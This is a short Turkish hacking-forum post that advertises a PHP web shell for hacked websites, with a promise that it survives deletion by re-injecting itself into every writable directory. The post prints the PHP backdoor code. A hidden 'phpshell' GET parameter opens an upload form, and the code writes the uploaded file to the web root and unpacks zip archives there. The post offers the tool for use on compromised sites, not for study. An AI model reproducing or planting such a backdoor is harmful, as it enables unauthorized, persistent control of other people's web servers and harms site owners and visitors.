Merhaba arkadaşlar, piyasa da bilinmeyen yeni bir shell ile karşınızdayız. Hack ile uğraşanların çok muzdarip olduğu bir konu olan shellerinin hemen silinmesidir. Biz de buna bir yol bulmak için bu paylaşacağımız shell ile silinse bile sizlere alternatif bir yükleme noktası oluşturacak, sitenin yazma izni olan tüm dizinlerine kodunuzu enjekte ederek size yardımcı olacaktır. Görseller ile daha iyi anlayacaksınızdır.
<?php
if(isset($_GET["phpshell"])){
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
$file = $_FILES['file']['name'];
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
$zip = new ZipArchive;
if ($zip->open($file) === TRUE) {
$zip->extractTo('./');
$zip->close();
echo 'Yükleme Başarılı';
} else {
echo 'Yüklenmedi.';
}
}else{
echo '<b>Basarisiz</b><br><br>';
}
}
}
?>Shelli indirmek için